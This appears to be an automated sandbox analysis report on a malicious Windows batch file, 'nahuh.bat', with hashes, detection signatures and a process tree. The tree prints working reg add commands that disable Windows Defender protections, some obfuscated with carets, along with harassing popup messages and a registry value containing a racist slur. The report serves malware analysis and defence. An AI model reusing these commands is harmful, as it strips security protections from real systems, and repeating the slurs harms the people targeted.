Overview

overview

10

Static

static

1

nahuh.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    1473s
  • max time network
    1499s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240704-en
  • resource tags

    arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/07/2024, 04:38

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    nahuh.bat

  • Size

    4KB

  • MD5

    37201a001d693f84dddfe76815e3f869

  • SHA1

    84adbec160a56f4da8f86230744dc8b379891576

  • SHA256

    2aa07e70f8f562504ec8a47426bd141d02889726794a4d1f14f2c4bd52ed594e

  • SHA512

    3649b94893b309c24a4b51f81b5dad26cd8a3f7a4d41e0e1a9c3e9c94b90121a46dbe26acb926ef23ad80dae2ffca0cba37fb053050e880d5b92df7fa39c57fe

  • SSDEEP

    96:HHQGHWr2H6HsHo3lH93HoCXNLIFfZITIxmc:d2yaMI3ld3tXNCfZITIv

Score
10/10
evasiontrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nahuh.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Windows\system32\cscript.exe
      cscript "C:\Users\Admin\AppData\Local\Temp\runadmin.vbs"
      2⤵
        PID:3916
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        2⤵
          PID:3848
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Mic^rosoft\Windows Defender" /v "DisableR^ealtimeMonitoring" /t REG_DWORD /d "1" /f
          2⤵
            PID:2260
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            PID:5104
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableO^nAccessProtection" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            PID:2572
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            PID:2956
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
            2⤵
              PID:2988
            • C:\Windows\system32\msg.exe
              msg * "fuck u"
              2⤵
                PID:488
              • C:\Windows\system32\reg.exe
                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "RegisteredOwner" /t REG_SZ /d "I hate nwords" /f
                2⤵
                  PID:1800
                • C:\Windows\system32\tasklist.exe
                  tasklist /FI "IMAGENAME eq chrome.exe" /FI "IMAGENAME eq firefox.exe" /FI "IMAGENAME eq msedge.exe"
                  2⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:908
                • C:\Windows\system32\find.exe
                  find /I "chrome.^exe"
                  2⤵
                    PID:460
                  • C:\Windows\system32\msg.exe
                    msg * "OPEN THE WEBSITE"
                    2⤵
                      PID:2856
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1 /nobreak
                      2⤵
                      • Delays execution with timeout.exe
                      PID:1096

                  Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\runadmin.vbs
                          Filesize

                          132B

                          MD5

                          e27735da1df9429e609b8bf50f0e5f27

                          SHA1

                          1bd24f94839cc7100fd174d9bb31d78b4d4efa6e

                          SHA256

                          9e11ee22767f011c35f7ac05334205835b13241210dced3abacc9322452987be

                          SHA512

                          c943b72c8554803ae2cea74153fb8c89558ac69daab725d8a2ffac230b536f917715b5d0ed82bd9c9df3a2ba85f1447d01940b7881fabfc642b498669e42f1a1

                          Download Submit